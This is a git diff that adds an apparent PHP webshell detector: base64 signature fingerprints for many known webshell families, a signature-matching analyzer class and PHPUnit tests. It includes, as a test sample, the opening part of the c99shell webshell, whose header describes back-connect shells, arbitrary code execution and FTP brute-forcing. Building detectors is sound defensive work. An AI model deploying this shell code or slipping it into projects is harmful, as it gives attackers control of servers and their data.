+s:64:"HMoJHY2NmIxODg2NiwgNDA5NikpIHsgJHY4ZDc3N2YzOCAuPSAkdjM0MWJlOTdkO"; +s:15:"spam[1][0][php]"; +s:64:"IGRlbGV0ZSB0aGUgZ3ppcCBmaWxlIGFsc28uIEkgcmVjb21tZW5kIGxlYXZpbmcg"; +s:17:"backup[1][2][php]"; +s:64:"pZihpc3NldCgkY21kWzFdKSAmJiAkY21kWzFdID09IjAwMSIpDQogICAgICAgew0"; +s:15:"pbot[0][0][php]"; +s:64:"bkxuM1FiVFJjb0hUaGtDQlJUSXpnUk1ZQUZSbVlvNXBIcUFHanpWcWhDY3FnR3Bj"; +s:19:"webshell[0][0][php]"; +s:64:"iIi4kcHdkLiJcIiAvPgoJCTwvZm9ybT4KCQk8L2Rpdj4iOwoJCSRzX3Jlc3VsdCA"; +s:16:"b374k[8][0][php]"; +s:64:"1Z2UDM3TEVBVGFvUXBEUG00T1NzYnpTeU10Yi92ejBJNW9mRGp1NzY0b0oyNVRiW"; +s:14:"c99[0][0][php]"; +s:64:"ICAgJHByY3MgPSBhcnJheSgpOw0KICAgICAgdW5zZXQoJHN0YWNrWzBdKTsNCiAg"; +s:22:"FaTaLisTiCz[1][0][php]"; +s:64:"xvcj0iUmVkIj4gCiAgICAgICAgICA8dGV4dGFyZWEgbmFtZT0iZHV6ZW54IiAKIC"; +s:19:"klasvayv[0][0][asp]"; +s:64:"SWVHZERDZWRLVkpfTkFPNnkqdHlnckhqcCpMNEpaOXpBek5zZklXTE1CNFpHMnRy"; +s:15:"wso[14][0][php]"; +s:64:"iAkcG9ydGEsIFByb3RvID0+ICd0Y3AnLCBUaW1lb3V0ID0+IDQpOwogICAgICAgI"; +s:18:"shellbot[1][0][pl]"; +s:64:"TAwJSIgaWQ9IkF1dG9OdW1iZXI0IiBoZWlnaHQ9IjE5Ij4KICAgICAgICAgIDx0c"; +s:17:"phvayv[0][0][php]"; +s:64:"llbnRlLT5yZW1vdmUoJGZoKTsKICAgICAgJGZoLT5jbG9zZTsKICAgICAgZGVsZX"; +s:15:"zorro[1][0][pl]"; +s:64:"sbmthSHN5VTY4SHpxSktyNi9mN3lZTVhyYWNWYndmT1ZqTHhmTmM3dVh0K3Z0cDl"; +s:14:"i47[0][0][php]"; +s:64:"z5cbiI7CiAgICAgICAgICAgICAgICAgICAgcHJpbnQgIlNjcmlwdDogPGJyIC8+P"; +s:17:"lostdc[0][0][php]"; +s:64:"C8vZS5nICJjOiIsICIvIiwiL2hvbWUiCiR0aW1lbGltaXQgPSA2MDsgLy9saW1pd"; +s:15:"c99[12][0][php]"; +s:64:"3VsdAogbHZBdHRyaWJ1dGVzID0gU3BsaXQoQ29udmVydEJpbmFyeShBdHRyaWJ1d"; +s:23:"removexplorer[0][0][vb]"; +s:64:"oIWZ1bmN0aW9uX2V4aXN0cyhzaGVsbF9leGVjKSl7JG9wb3A9cG9wZW4oJG9jbWQ"; +s:17:"ekin0x[0][0][php]"; +s:64:"CAgICAgcHJpbnRMb2dpbigpOw0KCUBpbmlfc2V0KCdvdXRwdXRfYnVmZmVyaW5nJ"; +s:20:"1n73ction[1][0][php]"; +s:64:"IDwvdGQ+PHRkPjxmb250IGNvbG9yPXllbGxvdz55YXptYSB5ZXRraXNpIHZhciE8"; +s:17:"zehir4[0][0][asp]"; +s:64:"2YXIgcyxhLGksaixyLGMsbCxiPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1"; +s:15:"wso[20][0][php]"; +s:64:"k7DQogICB9DQogICBpZiAoXCRjYXNlID1+IC9ebXNnXHMrKFxTKykgKC4qKS8pIH"; +s:20:"egyspider[1][0][php]"; +s:64:"TdyI7DQokcG9ydFsyMTA2XSA9ICJNWkFQIjsNCiRwb3J0WzIxNDBdID0gIkRlZXB"; +s:14:"gfs[2][0][php]"; +s:64:"2WlUza2hETEtDbGxyb2s0R05XSFdnc1NUeVhpM1dvdVlLWDVmU0xyWGxySFlWSkd"; +s:25:"shell_uploader[9][0][php]"; +s:64:"DeyRkY2Nzb2NrfXtjdXJieXRlfSA9IDA7DQogICREQ0N7JGRjY3NvY2t9e2FycXV"; +s:18:"shellbot[0][0][pl]"; +s:64:"3gsJGV0LCRmb290ZXIsJGhjd2Q7DQplY2hvICc8aW1nIHNyYz0iaHR0cDovL3cwb"; +s:15:"obet[0][0][php]"; +s:64:"29yYXRpb246bm9uZQp9Ci8vLS0+Cjwvc3R5bGU+CjwvaGVhZD4KPGJvZHk+Cjw/C"; +s:16:"mysql[1][0][php]"; +s:64:"kpKSl7DQplY2hvKCJTYWZlIE1vZGUgb2YgdGhpcyBTZXJ2ZXIgaXMgOiAiKTsNCm"; +s:15:"cmd[22][0][php]"; +s:64:"FI+Cjw/cGhwCiAgfQo/PgogIDxUUj4KCiAgPFREPjxESVYgU1RZTEU9ImZvbnQtZ"; +s:16:"h4ntu[0][0][php]"; +s:64:"dfYmxhbmsnIGhyZWY9JyRjb25maWcnPmNvbmZpZzwvYT48L3RkPjx0ZD4iLiRyLi"; +s:18:"symlink[1][0][php]"; +s:64:"NQM2NpNE1TcmlXdkVTNTFVb2NFTEUvUHlZaGNZakdrbjZRbWIzR0w0OFAwWFpkbk"; +s:14:"r57[4][0][php]"; +s:64:"Ymswdk5XNHZRVXB1TDAwMWJpOWFjRzR2YlZwdUwzcEtiaTh2T0hkQlFVMTNRU0l1"; +s:21:"locusshell[0][0][php]"; +s:64:"MzWjZkb0FaeWdsbWFFZFlmdi9Jbm1uaVVIdGVmREFJaXNsQmdCT2E2akJaKzBaeU"; +s:19:"filesman[3][0][php]"; +s:64:"0QlRmeURmZndBRDQ2cUFBQUFpMzM4aTAwTXdmOEVUNDFNTWZ5RC96OTJBMm8vWDR"; +s:18:"wacking[0][0][php]"; +s:64:"RceDY5b25hbGx5LCBceDYxIFx4MzQwNCBOXHg2ZnRceDIwXHg0Nlx4NmZceDc1bm"; +s:15:"wso[17][0][php]"; +s:64:"k1vQU0wN0hLVU93S2J1RHd6c3dydWJOanJlVURGV2dEQkF3YWpCM0FpYUhHdmZ1e"; +s:20:"stunshell[1][0][php]"; +s:64:"CR2M2QyNmIwYjEpIHsgZ2xvYmFsICR2NjE5ZDc1Zjg7IGlmICghaW5fYXJyYXkoJ"; +s:15:"spam[0][0][php]"; +s:64:"FoMGQ5U0RSVzJtT2JYUjl4dFp5cUVaVnpuenZ2QUhaMDdzemRFNzBMTmtUUU5ka3"; +s:20:"1n73ction[2][0][php]"; +s:64:"CAgICAgLy8NCi8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8NCg0KDQppZ"; +s:19:"safemode[4][0][php]"; +s:64:"jIyMjIyMjIyMjIyMjIyMjIyMjIwoKI1YgY2VsamFoIG5lc2Fua2Npb25pcm92YW5"; +s:15:"lurm[0][0][cgi]"; +s:64:"k7IGV4aXQ7IH0gPz48P3BocCBpZihpc3NldCgkX0dFVFsidDc2MjRuIl0pKXsgIC"; +s:19:"filesman[7][0][php]"; +s:64:"vdHI+XG4iOwoKICAJZWNobyAiPC90YWJsZT48L3RkPiI7CgogCWVjaG8gIjwvdGF"; +s:20:"phpshell[16][0][php]"; +s:64:"GVuZCI7DQpicmVhazsNCg0KDQovL1BIUCBFdmFsIENvZGUgZXhlY3V0aW9uDQpjY"; +s:21:"kadotshell[1][0][php]"; +s:64:"mZvcms7DQogICAgICAgICAgICAgIHN5c3RlbSAoYCRraWxsZGApOw0KICAgICAgI"; +s:17:"irc_bot[1][0][pl]"; +s:64:"mIzEwNzc7JiMxMDg1OycsCidydV90ZXh0NjQnPT4nJiMxMDQ0OyYjMTA4MDsmIzE"; +s:14:"r57[2][0][php]"; +s:64:"2RldXMgUGVybCBSZW1vdGUgU2hlbGxcbiI7CgpzeXN0ZW0oZGF0ZSk7CgpzeXN0Z"; +s:18:"asmodeus[0][0][pl]"; +s:64:"PD9waHANCmlmKCRfUE9TVFsia2V5Il0gPT0gImYwZGVkNDdkZmE4YTM4ZGQ0NmU5"; +s:15:"cmd[10][0][php]"; +s:64:"5hbWU9MSNjb252ZXJ0Pm1kNTwvYT4pPC9oMj48UD4iOwoKICAgaWYgKCFpc3NldC"; +s:21:"remoteview[0][0][php]"; +s:64:"dYK3VmMFgrVURuY0lEMTF4RWkyUkVQaDBkTjFkbnFoRVF6bDhndlBvTllmSDFScX"; +s:14:"r57[9][0][php]"; +s:64:"ICAgICAgICAgICAgICAgICAgICAgICRkaXJfbGlzdCA9IGltYXBfbGlzdCgkc3Ry"; +s:23:"shellarchive[0][0][php]"; +s:64:"gnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2FjY2VzX3dlYi9jb25maWcucG"; +s:19:"priv8_scr[0][0][pl]"; +s:64:"yOXFmcHZEWjIweVZVWEFQIiwiMk95NWhWUXhUYk9rQlMraTRaUEVEZnNmSjEzRkV"; +s:20:"phpshell[11][0][php]"; +s:64:"lXUkFxOXBQU0JSc051YnhkOStYYWh2d05lSXFEdFJYRHEveFFLWENlVDlxK3QNCk"; +s:16:"b374k[7][0][php]"; +s:64:"QuYXBwZW5kQ2hpbGQoZWRpdCk7ZmllbGQuc3R5bGUuZGlzcGxheT0nbm9uZSc7ZW"; +s:24:"mysql_adminer[0][2][php]"; +s:64:"cmRlcjogMXB4IHNvbGlkICNDQkFCNzg7IH0KI2NvbnRlbnQgeyBwYWRkaW5nOiAx"; +s:20:"loadshell[0][0][php]"; +s:64:"BVV3I0c3A0UEUvdXNBQ3p5SE5jQzQ5Z1E4TEZoZnRxODBBOHVIQ3hUK0craW5CVm"; +s:20:"filesman[16][0][php]"; +s:64:"X2V4aXN0cygibWFpbCIpKXsNCmVjaG8gJHRhYmxlX3VwMS4kbGFuZ1skbGFuZ3Vh"; +s:14:"r57[6][0][php]"; +s:64:"U1RFxbXS9nLCAiW10iKTsKCQkJCVREc2hlbGxfdGFic19tb2RpZnlfdGFiKGN1cn"; +s:18:"tdshell[0][0][php]"; +s:64:"MCk7CQogaWYoISRjb25uZWN0aW9uKSB7IGZlKCRsYW5ndWFnZSwwKTsgfQogZWxz"; +s:15:"r57[19][0][php]"; +s:64:"IiRyZWFsL3NwbG9pdHouemlwIjsgPz4iPjxicj48YnI+IAo8aW5wdXQgdHlwZT1z"; +s:14:"c99[4][0][php]"; +s:64:"Q7PC9mb250PiIpOwogICAgICAgICAgICAgICA8c2NyaXB0IHR5cGU9InRleHQvam"; +s:21:"remoteview[1][0][php]"; +s:64:"JEZPUk17REZJTEV9KSlbN107CiAgICgkZmlsZW5hbWUgPSAkRk9STXtERklMRX0p"; +s:22:"perlwebshell[0][0][pl]"; +s:64:"dTUycsJ3dlejdQVzA5RkZWcDdSZEpsJywnbklHcitXbDZCT3Y4clR5dVcnLCdVWW"; +s:20:"phpshell[10][0][php]"; +s:64:"X3IoJEdMT0JBTFMpOycsDQoJJ3BocF9pbmknCT0+CSckSU5JPWluaV9nZXRfYWxs"; +s:18:"dxshell[2][0][php]"; +s:64:"GQgbm93cmFwPi0tPC90ZD4nKTsKCQkJcCgnPHRkIG5vd3JhcD4nKTsKCQkJcCgnP"; +s:17:"phpspy[4][0][php]"; +s:64:"luZ3MnXVsnZmlsZS11cGxvYWQnXSkgeyA/Pgo8YnI+PGJyPgo8ZmllbGRzZXQ+Ci"; +s:20:"phpshell[19][0][php]"; +s:64:"+SGV4PC90ZD48dGQgd2lkdGg9JzI1JScgYmdjb2xvcj0nIzI4MjgyOCc+PC90ZD4"; +s:17:"jackal[4][0][php]"; +s:64:"gXG4iOwplY2hvICI8YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPXZpZXdEYXRhJmR"; +s:16:"mysql[0][0][php]"; +s:64:"Y3lmQWFYaVlBWEIzQVNBSEg0Q3lBYUFYNW1wdmFXNG9KeGZ3T2ljc0JDRXBGQkI5"; +s:15:"wso[13][0][php]"; +s:64:"sIGZhbHNlICk7DQpoZWFkZXIoICdQcmFnbWE6IG5vLWNhY2hlJyApOw0KDQplY2h"; +s:20:"extplorer[0][2][php]"; +s:64:"VTeXN0ZW1PYmplY3QiKQoJCVNldCBmID0gZnNvLkdldEZpbGUoc3RyRmlsZW5hbW"; +s:17:"rhtool[1][0][asp]"; +s:64:"nQuPSRsYW5nWyd1cGxvYWRvayddOwp9CgppZihpc3NldCgkX1BPU1RbJ3VwbG9hZ"; +s:21:"fatalshell[0][0][php]"; +s:64:"FZKTzJjWG9ocFZmNDkrT2Z2N0o4WEY4d0RFM0tRK2ZRdlpnT0JEQlhRZHFJYjhoT"; +s:20:"phpshell[34][0][php]"; +s:64:"HUwMDYzXHUwMDY1XHUwMDY0XHUwMDY5XHUwMDZDXHUwMDNCXHUwMDI2XHUwMDIzX"; +s:15:"cmd[19][0][php]"; +s:64:"yIikuVmFsdWUKCW1heD1vYmpVcGxvYWQuRmllbGRzKCJtYXgiKS5WYWx1ZQoKCWZ"; +s:17:"zehir4[1][0][php]"; +s:64:"vWU9rOHNxOGVjUmpIbjFmV0J4KzMyandmVXJCenA3WUdJZHllMlpCbGlKWnJiZXQ"; +s:20:"phpshell[36][0][php]"; +s:64:"c2hzaGV4aXQoKTt9CmlmICgkYWN0ID09ICJzZWN1cml0eSIpCnsKIGVjaG8gIjxj"; +s:15:"c99[24][0][php]"; +s:64:"dGgiLCJ3KyIpOwoJZndyaXRlICgkZnAsIiIpIDsKCWZ3cml0ZSAoJGZwLCRzYXZl"; +s:22:"simattacker[1][0][php]"; +s:64:"cld5dGZVM3NRQ2U5YUZYbVNNZENSSEZ0RDBmMDZUTDdLeW9nOUJZdlpQREVTNGxD"; +s:15:"wso[15][0][php]"; +s:64:"ICAgICAgICAgICAgICAgICAgICAkZG9zPSAiQvZ5bGUgQmlyIERvc3lhIFZhcmR5"; +s:18:"casus15[0][0][php]"; +s:64:"1lPSQxXG5cbiI7CiAgICAgICAgICAgICAgICBwcmludCB3aGlsZSg8U0VOREZJTE"; +s:16:"telnet[0][0][pl]"; +s:64:"yKEBpbmlfZ2V0KCJzYWZlX21vZGUiKSkgPT0gIm9uIikgeyAgJHNhZmVtb2RlID0"; +s:36:"cristercorp_infocollector[0][0][php]"; +s:64:"ZpZy5waHAiLA0KCQkibG9jYXRlIGNvbmZpZy5pbmMiID0+ICJsb2NhdGUgY29uZm"; +s:20:"filesman[24][0][php]"; +s:64:"jVFBKTzhraEdwZ201d1haSlp0cnFTbU52K2tISVFIOU9rVU9iaCtCRVhDcW5SeTl"; +s:22:"tbdsecurity[0][0][php]"; +s:64:"FUSGhSU25KRVNHd3lOMWRhTTA1YWNYVTBOVFkxVDFWaFpWQm5PVzk2WXk5SFQyVT"; +s:15:"wso[12][0][php]"; +s:64:"DVE14akRUT1ZUZVl0SGFsc0d1bmNIVGx2Y3JGeEYwWFpVbW5KTzNpWENNMWpmbEx"; +s:19:"backdoor[3][0][php]"; +s:64:"zMvb0pOWm1NN05QQnI1Y3hyazBzNUQrU3FqMkhaYk5ncGpLK2hEM0ciLCJIek5PV"; +s:25:"shell_uploader[4][0][php]"; +s:64:"Vx4NDhceDY2XHgzM1x4NDlceDU0XHg1ZVx4NmJceDM1XHg0MFx4M2NceDY5XHgzN"; +s:18:"postman[0][1][php]"; +s:64:"NlYmViZWInPg0KPGNlbnRlcj4NCjxiPjxmb250IHNpemU9JzYnIGZhY2U9J1dlYm"; +s:17:"coderz[2][0][php]"; +s:64:"HOWtQVkJQVTFRK1BHbHVjSFYwSUhSNWNHVTlhR2xrWkdWdUlHNWhiV1U5WVdOMEl"; +s:21:"locusshell[2][0][php]"; +s:64:"NpdGUsIDgwLCAkZXJybm8sICRlcnJzdHIsIDMwKTsgDQppZiAoISRmcCkgeyANCi"; +s:19:"nixshell[1][0][php]"; +s:64:"V/jZAxUIBO0c8zKcSmt1rgNhN0y8gmOxpwlxdG4DZLJAV5tqdpqmKwup5EyC6JT2"; +s:19:"webadmin[1][2][php]"; +s:64:"9nOwoKICBpZiAoJHJlcXVpcmUpIHsKICAgICMgYWxsIGZvdW5kIGdvbm5hIGJlIG"; +s:17:"telnetd[2][0][pl]"; +s:64:"hyZWY9IiVzP3dvcmtfZGlyPSVzIj4lczwvYT4vtCwKJFBIUF9TRUxGLCB1cmxlbm"; +s:19:"phpshell[3][0][php]"; +s:64:"0ZXI+PHRhYmxlPjx0cj48dGQ+PGZvcm0gYWN0aW9uPVwiJFNGaWxlTmFtZT8kdXJ"; +s:19:"safemode[3][0][php]"; +s:64:"cmFuZ2UoIkEiLCJaIikgYXMgJGxldHRlcikgDQoJeyANCgkkYm9vbCA9IEBpc19k"; +s:20:"devilz0de[0][0][php]"; +s:64:"0ZD5cbiI7DQpwcmludCAiPHRkPlsgPGEgY2xhc3MgPSBcImhlYWRcIiBocmVmID0"; +s:17:"lostdc[1][0][php]"; +s:64:"SW5MbWgwYld4emNHVmphV0ZzWTJoaGNuTW9KRjlRVDFOVVd5ZGhKMTBwTGljaVBp"; +s:20:"v0ld3m0rt[0][0][php]"; +s:64:"cMmJvdFwyXTogcGhwYm90IDIuMCBieTsgI2NyZXdAY29ycC4iKTsNCiAgICAgICA"; +s:15:"pbot[2][0][php]"; +s:64:"QtY29sb3I6ICMwMDAwMDA7Cn0KLnN0eWxlNCB7Zm9udC13ZWlnaHQ6IGJvbGR9Cm"; +s:15:"kral[0][0][php]"; +s:64:"ZG1Gc2RXVTlJbEpsYm1GdFpUOGlJQzgrRFFvOFAzQm9jQ0I5SUdWc2MyVnBaaWdr"; +s:17:"hshell[0][0][php]"; +s:64:"N2JCblF2dWR4WDJuZVZtKzRoMzB4N1AxUEh2WnVHYitYZnoxVmZhcklhajZicWhZ"; +s:20:"hostdevil[0][0][php]"; +s:64:"9IENvbW1hbmRUeXBlLlRleHQ7DQogICAgICAgICAgICBjb21tLkNvbW1hbmRUZXh"; +s:22:"aspx-shell[0][0][aspx]"; +s:64:"CIvIiwgJG5hbWUpOwokZnIgPSAiXHg1MFx4NGJceDAzXHgwNCI7CiRmciAuPSAiX"; +s:26:"itsecteam_shell[2][0][php]"; +s:64:"IHsgaWYgKCFpc19udW1lcmljKCRmcWJfbGVuZ2h0KSkgeyRmcWJfbGVuZ2h0ID0g"; +s:22:"FaTaLisTiCz[4][0][php]"; +s:64:"mdpbi1sZWZ0OiA1cHg7DQp9DQppbnB1dCAsIHRleHRhcmVhICwgYnV0dG9uICwgY"; +s:27:"brute_force_tool[1][0][php]"; +s:64:"gIDhwdCAgICAgICAhaW1wb3J0YW50OwpiYWNrZ3JvdW5kLWNvbG9yOiAgICMxMTE"; +s:18:"crystal[0][0][php]"; +s:64:"cGU9XCJ0ZXh0XCI+PGJyPgp1c2VybmFtZSA6IDxJTlBVVCBzaXplPVwiMTVcIiB2"; +s:17:"update[0][0][php]"; +s:64:"XE3U1IvUHNaRDZwWlA5MWNNVC9MOFdXRXpLdmJmVExJOFhjNkFqVnprdnZ2N2ppN"; +s:22:"FaTaLisTiCz[5][0][php]"; +s:64:"5jdGlvbnMsJ3NoZWxsX2V4ZWMnKSl7JGV4ZWM9IHNoZWxsX2V4ZWMoJGNvbW1hbm"; +s:17:"jackal[5][0][php]"; +s:64:"jblVuS1NrZ2UzQmhjM04wYUhKMUtDUmZVa1ZSVlVWVFZGc25hRzkxWkdsdWFTZGR"; +s:14:"cmd[5][0][php]"; +s:64:"1RnNm90K3hEVllMT3NDdi9aemh1RzFZVVY5dG9hWmdXTUhmZVFHTlk3dUx3MkNkW"; +s:15:"c99[23][0][php]"; +s:64:"1cHggOHB4ICFpbXBvcnRhbnQ7Ym9yZGVyOiBub25lICFpbXBvcnRhbnQ7Ym9yZGV"; diff --git a/src/SignaturesAnalyzer.php b/src/SignaturesAnalyzer.php new file mode 100644 index 0000000000000000000000000000000000000000..8b5727cd92aa11aa964fbb7146c43abde7d130b7 --- /dev/null +++ b/src/SignaturesAnalyzer.php @@ -0,0 +1,75 @@ +<?php +namespace AnalyzerNS; + +require_once 'const.php'; + +class SignaturesAnalyzer +{ + private function compareFingerprints($pFingerprints, $pFileContent) + { + $key = null; + foreach ($pFingerprints as $fingerprint => $shell) { + if (preg_match($fingerprint, $pFileContent)) { + # [version] => 1359928984 db content FIXME?!?!? + if ($fingerprint == "version") { + break; + } + $key = $shell; + break; + } + } + return $key; + } + + /** + * TEST: comes from PHP-Webshell Detector, will be updated. Only for testing + * @param string $pFileContent + * @return NULL|NULL|array|mixed + */ + public function scanFile($pFileContent) + { + if ($pFileContent == null || !strlen($pFileContent)) { + return null; + } + $fingerprints = $this->getFingerprints(); + if ($fingerprints == null || !count($fingerprints)) { + return null; + } + $fp_regex = array(); + foreach ($fingerprints as $fingerprint => $shell) { + if (strpos($fingerprint, 'bb:') !== false) { + $fingerprint = base64_decode(str_replace('bb:', '', $fingerprint)); + } + $fp_regex['/' . preg_quote($fingerprint, '/') . '/'] = $shell; + } + $fp_flag0 = $this->compareFingerprints($fp_regex, $pFileContent); + $fp_flag1 = $this->compareFingerprints($fp_regex, base64_encode($pFileContent)); + //FIXME remove this + echo "flag 0:".$fp_flag0; //version + echo "\nflag 1:".$fp_flag1; + } + + /** + * Reads the file containing signatures + * @return array|mixed + */ + private function getFingerprints() + { + $res = []; + $fileName = __DIR__.'/../res/'.FINGERPRINTS_FILE; + if (file_exists($fileName)) { + $res = unserialize(base64_decode(file_get_contents($fileName))); + } + return $res; + } + + /** + * Anonymous call + * @param string $func name + * @return mixed return value of the routine + */ + public function testMe($func) + { + return $this->$func(); + } +} diff --git a/src/const.php b/src/const.php new file mode 100644 index 0000000000000000000000000000000000000000..7562b4d4effd19141834befc53f0bbbe0326afb7 --- /dev/null +++ b/src/const.php @@ -0,0 +1,5 @@ +<?php +namespace AnalyzerNS; + +const MAX_FILE_SIZE = 20000; +const FINGERPRINTS_FILE = "shelldetect.db"; diff --git a/tests/SignaturesAnalyzerTest.php b/tests/SignaturesAnalyzerTest.php new file mode 100644 index 0000000000000000000000000000000000000000..864740bb3b680cc0b9abcae689717b2779ece0ff --- /dev/null +++ b/tests/SignaturesAnalyzerTest.php @@ -0,0 +1,17 @@ +<?php +namespace Tests; + +require __DIR__ . "/../src/SignaturesAnalyzer.php"; + +use PHPUnit\Framework\TestCase; +use AnalyzerNS\SignaturesAnalyzer; + +class AnalyzerTest extends TestCase +{ + + public function testTestMe() + { + $analyzer = new SignaturesAnalyzer(); + $this->assertTrue($analyzer->scanFile(file_get_contents(__DIR__."/res/c.php")) == null); + } +} diff --git a/tests/UtilTest.php b/tests/UtilTest.php new file mode 100644 index 0000000000000000000000000000000000000000..0b732dfd9ec61a7a0eb4e186d63d031a67216fa5 --- /dev/null +++ b/tests/UtilTest.php @@ -0,0 +1,51 @@ +<?php +namespace Tests; + +require __DIR__."/../src/util.php"; + +use PHPUnit\Framework\TestCase; +use function AnalyzerNS\removeAllWhiteSpaces; +use function AnalyzerNS\removeCRLF; +use function AnalyzerNS\removeMultiWhiteSpaces; +use function AnalyzerNS\removeWhiteSpacesOutsideString; + +class UtilTest extends TestCase +{ + private $strings = ["<?php\n + \$a = 10; + \$b = 'phpi nfo'; + + echo \$a; + \$b();?>", + "<?php function inline(){return true;} + phpinfo();?>" + ]; + + public function testRemoveCRLF() + { + foreach ($this->strings as $string) { + $this->assertTrue(removeCRLF($string) !== $string); + } + } + + public function testRemoveMultiWhiteSpaces() + { + foreach ($this->strings as $string) { + $this->assertTrue(removeMultiWhiteSpaces($string) !== $string); + } + } + + public function testRemoveAllWhiteSpaces() + { + foreach ($this->strings as $string) { + $this->assertTrue(removeAllWhiteSpaces($string) !== $string); + } + } + + public function testRemoveWhiteSpacesOutsideString() + { + foreach ($this->strings as $string) { + $this->assertTrue(removeWhiteSpacesOutsideString(token_get_all($string)) !== $string); + } + } +} diff --git a/tests/res/c.php b/tests/res/c.php new file mode 100644 index 0000000000000000000000000000000000000000..dc6d688a4b543e27889d4dba735f5f31c27c898a --- /dev/null +++ b/tests/res/c.php @@ -0,0 +1,3069 @@ +<?php +/* +****************************************************************************************************** +* +* c99shell.php v.1.0 pre-release build #13 +* Freeware license. +* © CCTeaM. +* c99shell - ôà éë-ìåÃåäæåð ÷åðåç www-áðîóçåð, "çà òî÷åÃûé" äëÿ âçëîìà . +* Âû ìîæåòå áåñïëà òÃî ñêà ÷à òü ïîñëåäÃþþ âåðñèþ Ãà äîìà øÃåé ñòðà Ãè÷êå ïðîäóêòà : + http://ccteam.ru/releases/c99shell +* +* WEB: http://ccteam.ru +* ICQ UIN #: 656555 +* +* ÎñîáåÃÃîñòè: +* + óïðà âëåÃèå ëîêà ëüÃûìè è óäà ëåÃÃûìè (ftp, samba) ôà éëà ìè/ïà ïêà ìè, ñîðòèðîâêà +* çà êà ÷èâà Ãèå ñêà ÷èâà Ãèå ôà éëîâ è ïà ïîê +* (ïðåäâîðèòåëüÃî óïà êîâûâà åòñÿ/ðà ñïà êîâûâà åòñÿ ÷åðåç tar) +* ïðîäâèÃóòûé ïîèñê (âîçìîæåà âÃóòðè ôà éëîâ) +* modify-time è access-time ó ôà éëîâ ÃÃ¥ ìåÃÿþòñÿ ïðè ðåäà êòèðîâà Ãèè (äëÿ îòêë. ñì $filestealth) +* + âûïîëÃÃ¥Ãèå ïðîèçâîëüÃîãî PHP-êîäà +* + êîäèðîâùèê äà ÃÃûõ ÷åðåç md5, unix-md5, sha1, crc32, base64 +* + áûñòðûé ëîêà ëüÃûé à Ãà ëèç áåçîïà ñÃîñòè ÎÑ +* + áûñòðîå ftp-ñêà Ãèðîâà Ãèå Ãà ñâÿçêè login;login èç /etc/passwd (îáû÷Ãî äà åò äîñòóï ê 1/100 à êêà óÃòîâ) +* ïîñòðà Ãè÷Ãûé âûâîä, ñîðòèðîâêà , ãðóïïîâûå îïåðà öèè Ãà ä ÃÄ/òà áëèöà ìè, óïðà âëåÃèå ïðîöåññà ìè SQL) +* + ñêðèïò "ëþáèò" include: à âòîìà òè÷åñêè èùåò ïåðåìåÃÃûå ñ äåñêðèïòîðà ìè è âñòà âëÿåò èõ â ññûëêè (îïöèà ëüÃî) + òà êæå ìîæÃî èçìåÃèòü $surl (áà çîâà ÿ ññûëêà ) êà ê ÷åðåç êîÃôèãóðà öèþ (ïðèÃóäèòåëüÃî) òà ê è ÷åðåç cookie "c99sh_surl", + èäåò à âòî-çà ïèñü çÃà ÷åÃèÿ $set_surl â cookie "set_surl" +* + âîçìîæÃîñòü "çà áèÃäèòü" /bin/bash Ãà îïðåäåëåÃÃûé ïîðò ñ ïðîèçâîëüÃûì ïà ðîëåì, +* èëè ñäåëà òü back connect (ïðîèçâîäèòñÿ òåñòèðîâà Ãèå ñîåäåÃÃ¥Ãèÿ, è âûâîäÿòñÿ ïà ðà ìåòðû äëÿ çà ïóñêà NetCat). +* + âîçìîæÃîñòü áûñòðîãî ñà ìî-óäà ëåÃèÿ ñêðèïòà +* + à âòîìà òèçèðîâà Ãà ÿ îòïðà âêà ñîîáùåÃèé î Ãåäîðà áîòêà õ è ïîæåëà Ãèÿõ à âòîðó (÷åðåç mail()) +* +* Ãðèâåäåà äà ëåêî ÃÃ¥ ïîëÃûé ñïèñîê âîçìîæÃîñòåé. +* +* Îæèäà åìûå èçìåÃÃ¥Ãèÿ: +* ~ Ãà çâèòèå sql-ìåÃåäæåðà +* ~ Äîáà âëåÃèå Ãåäîñòà þùèõ ðà ñøèðåÃèé ôà éëîâ +* +* ~-~ Ãèøèòå îáî âñåõ Ãà éäåÃûõ Ãåäîðà áîòêà õ, æåëà åìûõ èçìåÃÃ¥Ãèÿõ è äîðà áîòêà õ (äà æå î ñà ìûõ ÃåçÃà ÷èòåëüÃûõ!) + â ICQ UIN #656555 ëèáî ÷åðåç ðà çäåë "feedback", áóäóò ðà ññìîòðåÃû âñå ïðåäëîæåÃèÿ è ïîæåëà Ãèÿ. +* +* Last modify: 29.07.2005 +* +* © Captain Crunch Security TeaM. Coded by tristram +* +****************************************************************************************************** +*/ +//Starting calls +if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} +error_reporting(5); +@ignore_user_abort(true); +@set_magic_quotes_runtime(0); +$win = strtolower(substr(PHP_OS,0,3)) == "win"; +define("starttime",getmicrotime()); +if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} +$_REQUEST = array_merge($_COOKIE,$_GET,$_POST); +foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} + +$shver = "1.0 pre-release build #13"; //Current version +//CONFIGURATION AND SETTINGS +if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";} +elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);} +else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL +} + +$surl_autofill_include = true; //If true then search variables with descriptors (URLs) and save it in SURL. + +if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} +if (empty($surl)) +{ + $surl = "?".$includestr; //Self url +} +$surl = htmlspecialchars($surl); + +$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. + +//Authentication +$login = ""; //login +//DON'T FORGOT ABOUT 